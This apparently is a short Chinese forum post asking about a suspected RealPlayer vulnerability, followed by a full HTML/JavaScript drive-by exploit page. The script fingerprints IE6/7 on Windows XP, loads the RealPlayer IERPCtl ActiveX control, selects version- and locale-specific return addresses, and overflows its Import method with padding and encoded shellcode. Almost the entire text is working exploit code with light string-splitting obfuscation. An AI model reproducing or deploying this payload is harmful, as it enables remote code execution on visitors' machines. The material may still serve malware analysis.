貌似有个real漏洞的?
没解出来
<localhost>
<script>
function alsyka()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
Real10Version = Real.PlayerProperty("PROD"+"UCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(Real10Version.indexOf("6.0.14.") == -1)
{
var CAORISv="SB";
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(Real10Version == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(Real10Version == "6.0.14.550")
ret = unescape("%63"+"%11%04%60");
else if(Real10Version == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(Real10Version == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(Real10Version == "6.0.14.536")
ret = unescape("%51%11%70%63");
else
return;
if(Real10Version.indexOf("6.0.10.") != -1)
{
for(i=0;i<4;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
else if(Real10Version.indexOf("6.0.11.") != -1)
{
for(i=0;i<6;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
else if(Real10Version.indexOf("6.0.12.") != -1)
{
for(i=0;i<9;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
else if(Real10Version.indexOf("6.0.14.") != -1)
{
for(i=0;i<10;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
AdjESP = "LLLL\\"+"XXXXXLD";
Shell ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0";
Shell2="p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDU";
Shell3="BzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqr";
Shell4="wSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmL";
Shell5="Hmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVP";
Shell6="wP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOV";
Shell7="tvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PU";
Shell8="oVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVi";
PayLoad = Padding + AdjESP + Shell + Shell2 + Shell3 +Shell4+Shell5+Shell6+Shell7+Shell8+Shell9;
while(PayLoad.length < 0x8000)
PayLoad += "ChuiZi"; h=Real;
h["I"+"mport"]("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
alsyka();
</script>